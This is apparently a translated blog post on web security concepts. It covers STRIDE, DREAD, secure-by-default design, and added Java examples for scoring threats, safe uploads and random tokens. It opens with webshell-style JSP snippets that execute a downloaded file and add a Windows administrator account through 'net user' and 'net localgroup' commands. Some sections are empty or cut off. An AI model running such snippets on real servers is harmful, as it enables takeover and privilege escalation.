Talk in Web Security (Security World View): Developing a secure We


Writer: bysocket (mud and brick pulp carpenter)

    • Micro-Blog: Bysocket

    • Watercress: Bysocket

Reprint it anywhere you want.

Why write about Web Security?

A single Java file can compromise your server; one JSP can download any file. How does this happen?
1. Write a JSP and upload it to the server.
2. Use the JSP to download any malicious program via HttpClient.
3. Run that program and read or add administrator information or data.
The snippets below, taken from what I wrote, show how little code this takes:

    if (!isWindows()) {
        // On Linux/Unix: make the downloaded file executable before running it
        Process process = Runtime.getRuntime().exec("chmod 777 " + strExeFile);
        if (process.waitFor() != 0)
            out.println("FAIL---> when open file");
    }
    // Run the downloaded file; "out" is the JSP implicit response writer
    Process process = Runtime.getRuntime().exec(strExeFile);
    if (process.waitFor() == 0)
        out.println("SUCCESS---> when open the file");

Java runs the downloaded program. The next snippet then adds an administrator user.

    if (isWindows()) {
        // Create a local user with the supplied account name and password
        String execStr = "cmd.exe /c " + "net user " + strAcc + " " + strPwd + " /add";
        Process process = Runtime.getRuntime().exec(execStr);
        if (process.waitFor() == 0) {
            // Then put that user into the local Administrators group
            Runtime.getRuntime().exec("cmd.exe /c " + "net localgroup Administrators " + strAcc + " /add");
        } else
            out.print("FAIL---> when " + execStr);
    }

That is how Java can be used to add an administrator user.

Attacks like these can be found anywhere, so we need to learn web security. The first place to learn from is the web itself.

Some Web Security concepts you need to know

As the environment gets worse, for example with haze, many people wear masks when going out. We trust the masks to protect us. Web security works the same way.

Note: ' Web security is based on trust; every kind of security on the web is also based on trust. '

Many web attacks are like haze:
1. XSS

2. CRLF injection

3. XPath Injection

4. HTML Injection

5. JavaScript Injection


XSS Development:

So there is a question: ' How do we analyze the web security of a software product or project? '

STRIDE and DREAD by Microsoft

STRIDE is a system developed by Microsoft for thinking about computer security threats. The threat categories are:
1. Spoofing of user identity

2. Tampering

3. Repudiation

4. Information Disclosure

5. Denial of Service

6. Elevation of Privilege

DREAD

The problem with a simplistic rating system is that team members usually won't agree on ratings. To help solve this, add new dimensions that help determine what the impact of a security threat really means. At Microsoft, the DREAD model was used to help calculate risk. With the DREAD model, you arrive at the risk rating for a given threat by asking the following questions:

1. Damage potential: how great is the damage if the vulnerability is exploited?

2. Reproducibility: how easy is it to reproduce the attack?

3. Exploitability: how easy is it to launch an attack?

4. Affected users: as a rough percentage, how many users are affected?

5. Discoverability: how easy is it to find the vulnerability?
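As a worked example of the DREAD questions above (added here, not part of the original post): each of the five dimensions gets a score and the risk is their average, which lets a team rank threats instead of arguing about a single number. The 1-10 scale, the High/Medium/Low bands and the scores for the three sample threats are assumptions chosen for illustration; the post itself only gives the five questions.

```java
import java.util.ArrayList;
import java.util.Comparator;
import java.util.List;

// Hypothetical DREAD scoring helper. Scale 1..10 per dimension and the
// High/Medium/Low bands are assumptions, not something the post specifies.
public class DreadRating {

    record Threat(String name, int damage, int reproducibility, int exploitability,
                  int affectedUsers, int discoverability) {
        Threat {
            for (int v : new int[] {damage, reproducibility, exploitability, affectedUsers, discoverability}) {
                if (v < 1 || v > 10) throw new IllegalArgumentException("scores must be 1..10");
            }
        }

        // Risk is the plain average of the five DREAD dimensions.
        double risk() {
            return (damage + reproducibility + exploitability + affectedUsers + discoverability) / 5.0;
        }

        // Assumed bands so the ranking can be turned into a decision.
        String band() {
            double r = risk();
            return r >= 7 ? "High" : r >= 4 ? "Medium" : "Low";
        }
    }

    // Highest risk first, so the team works the top of the list down.
    static List<Threat> ranked(List<Threat> threats) {
        List<Threat> copy = new ArrayList<>(threats);
        copy.sort(Comparator.comparingDouble(Threat::risk).reversed());
        return copy;
    }

    public static void main(String[] args) {
        // Constructed scores for attacks this post mentions, for illustration only.
        List<Threat> threats = List.of(
            new Threat("Unrestricted JSP upload", 10, 10, 8, 10, 7),   // risk 9.0, High
            new Threat("Reflected XSS in search", 5, 9, 7, 6, 8),      // risk 7.0, High
            new Threat("CRLF injection in a log line", 3, 6, 5, 2, 4)); // risk 4.0, Medium
        for (Threat t : ranked(threats)) {
            System.out.printf("%-30s risk=%.1f (%s)%n", t.name(), t.risk(), t.band());
        }
    }
}
```

The record's compact constructor rejects out-of-range scores up front, so a rating sheet with a typo fails loudly rather than silently skewing the ranking.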

Given these categories, a good web security design has the following features:

1. Solves the problem effectively

2. Good experience for users

3. Low coupling

4. Easy to extend and upgrade

How to Develop a Secure Website

Note: ' Security is a normal subject and a poised art. '

1. Secure by Default

This is also about the security of the users. We can create white lists and black lists, and limit what operations a user may perform.
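The following upload handler is an added example (not code from the original post) that applies "secure by default" to the attack the post opened with: the JSP-upload step only works if the server accepts whatever file name and extension the client sends. Here the extension must appear on an allowlist, the client-supplied path is discarded, the stored name is chosen by the server, and files land outside the web root so the servlet container can never execute them. The class name, the allowed extensions, the 5 MiB limit and the sample inputs in main are assumptions.

```java
import java.io.ByteArrayInputStream;
import java.io.IOException;
import java.io.InputStream;
import java.io.OutputStream;
import java.nio.file.Files;
import java.nio.file.Path;
import java.nio.file.Paths;
import java.security.SecureRandom;
import java.util.Locale;
import java.util.Set;

// Hypothetical upload handler: allowlist, not blocklist; server-chosen names;
// storage outside the webapp directory so nothing uploaded is ever served as JSP.
public class SafeUploadHandler {

    // Assumed allowlist. .jsp, .jspx, .war and anything unlisted are rejected by default.
    private static final Set<String> ALLOWED_EXTENSIONS = Set.of("png", "jpg", "jpeg", "pdf");
    private static final long MAX_BYTES = 5L * 1024 * 1024;   // assumed 5 MiB limit
    private static final SecureRandom RANDOM = new SecureRandom();

    private final Path storageRoot;   // e.g. /var/app/uploads, never under the web root

    public SafeUploadHandler(Path storageRoot) {
        this.storageRoot = storageRoot.toAbsolutePath().normalize();
    }

    /** Returns the lower-cased extension if the client-supplied name is acceptable, else throws. */
    static String validateName(String clientFileName) {
        if (clientFileName == null || clientFileName.isEmpty()) {
            throw new IllegalArgumentException("missing file name");
        }
        // Drop any directory part the client sent ("../../ROOT/shell.jsp" -> "shell.jsp").
        String base = Paths.get(clientFileName.replace('\\', '/')).getFileName().toString();
        int dot = base.lastIndexOf('.');
        if (dot <= 0 || dot == base.length() - 1) {
            throw new IllegalArgumentException("file name must have an extension");
        }
        // Judge only the LAST extension: "shell.png.jsp" is a .jsp and is rejected.
        String ext = base.substring(dot + 1).toLowerCase(Locale.ROOT);
        if (!ALLOWED_EXTENSIONS.contains(ext)) {
            throw new IllegalArgumentException("extension not allowed: " + ext);
        }
        return ext;
    }

    /** Stores the body under a random server-chosen name and returns that name. */
    public String store(String clientFileName, InputStream body) throws IOException {
        String ext = validateName(clientFileName);

        // The client never influences the stored name: 16 random bytes, hex-encoded.
        byte[] id = new byte[16];
        RANDOM.nextBytes(id);
        StringBuilder name = new StringBuilder();
        for (byte b : id) name.append(String.format("%02x", b));
        name.append('.').append(ext);

        Path target = storageRoot.resolve(name.toString()).normalize();
        if (!target.startsWith(storageRoot)) {   // defensive: the resolved path must stay inside the root
            throw new IllegalStateException("resolved path escaped storage root");
        }
        Files.createDirectories(storageRoot);

        // Bounded copy: a lying Content-Length cannot fill the disk, and a
        // partially written oversize file is removed.
        boolean ok = false;
        try (OutputStream out = Files.newOutputStream(target)) {
            byte[] buf = new byte[8192];
            long total = 0;
            int n;
            while ((n = body.read(buf)) != -1) {
                total += n;
                if (total > MAX_BYTES) throw new IllegalArgumentException("file too large");
                out.write(buf, 0, n);
            }
            ok = true;
        } finally {
            if (!ok) Files.deleteIfExists(target);
        }
        return name.toString();
    }

    public static void main(String[] args) throws IOException {
        SafeUploadHandler handler = new SafeUploadHandler(Files.createTempDirectory("uploads"));
        byte[] sample = "constructed sample body, not a real image".getBytes();
        System.out.println("stored as " + handler.store("photo.PNG", new ByteArrayInputStream(sample)));
        // Constructed hostile names; each one must be rejected before anything is written.
        for (String bad : new String[] {"shell.jsp", "../../ROOT/shell.jsp", "shell.png.jsp", "noext"}) {
            try {
                validateName(bad);
                System.out.println("UNEXPECTED: accepted " + bad);
            } catch (IllegalArgumentException e) {
                System.out.println("rejected " + bad + ": " + e.getMessage());
            }
        }
    }
}
```

Note what the allowlist does not do: it does not inspect content, so a real handler would additionally check magic bytes or re-encode images. What it does guarantee is that even a misnamed upload is stored under a name and directory the server controls, which is the property that breaks step 1 of the attack described at the top of the post.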

2. Defense in Depth

Defense in Depth is a crucial model for implementing effective information security. The details of such a diverse model are what make it successful; I have put together a series of eight webcasts on this topic. Here are the 7 levels:

3. Separation of Data and Presentation

4. Unpredictability

Parameters are easy to guess, so make them hard to guess.
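An added example of the "unpredictability" point (not from the original post): a sequential identifier lets anyone who sees one value guess its neighbours, whereas 256 bits from a cryptographically secure generator cannot be enumerated, and tokens are compared in constant time so that response timing does not leak partial matches. The class and method names are assumptions.

```java
import java.nio.charset.StandardCharsets;
import java.security.MessageDigest;
import java.security.SecureRandom;
import java.util.Base64;
import java.util.concurrent.atomic.AtomicLong;

// Hypothetical helper contrasting a guessable parameter with an unpredictable one.
public class UnpredictableIds {

    // BEFORE: a counter. Seeing order 1041 tells a user that 1040 and 1042
    // almost certainly exist and belong to someone else.
    private static final AtomicLong COUNTER = new AtomicLong(1040);

    static String guessableId() {
        return Long.toString(COUNTER.incrementAndGet());
    }

    // AFTER: 32 bytes (256 bits) from a CSPRNG, URL-safe base64 without padding.
    // java.util.Random is not suitable: its whole output is reproducible from the seed.
    private static final SecureRandom RANDOM = new SecureRandom();

    static String unpredictableId() {
        byte[] raw = new byte[32];
        RANDOM.nextBytes(raw);
        return Base64.getUrlEncoder().withoutPadding().encodeToString(raw);
    }

    // Compare a presented token with the stored one without short-circuiting on
    // the first differing byte; MessageDigest.isEqual is documented as constant-time.
    static boolean tokensMatch(String presented, String expected) {
        return MessageDigest.isEqual(
            presented.getBytes(StandardCharsets.UTF_8),
            expected.getBytes(StandardCharsets.UTF_8));
    }

    public static void main(String[] args) {
        System.out.println("guessable:     " + guessableId() + ", " + guessableId() + ", " + guessableId());
        String token = unpredictableId();
        System.out.println("unpredictable: " + token + "  (" + token.length() + " chars, 256 bits)");
        // Constructed check: the right token matches, a one-character variant does not.
        String tampered = (token.charAt(0) == 'A' ? 'B' : 'A') + token.substring(1);
        System.out.println("exact token matches:    " + tokensMatch(token, token));
        System.out.println("tampered token matches: " + tokensMatch(tampered, token));
    }
}
```

Where such a value must also be tied to a user (download links, password-reset links, session identifiers), the same rule applies: generate it server-side from SecureRandom, store it, and never derive it from anything the user already knows such as an account id or timestamp.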

Think in Web Security

Like a bucket of water: we trust both the bucket and the water, and that trust is the security. When the bucket is contaminated with poison, the security is broken.
Note: ' Open, Free, Share '

Good night~

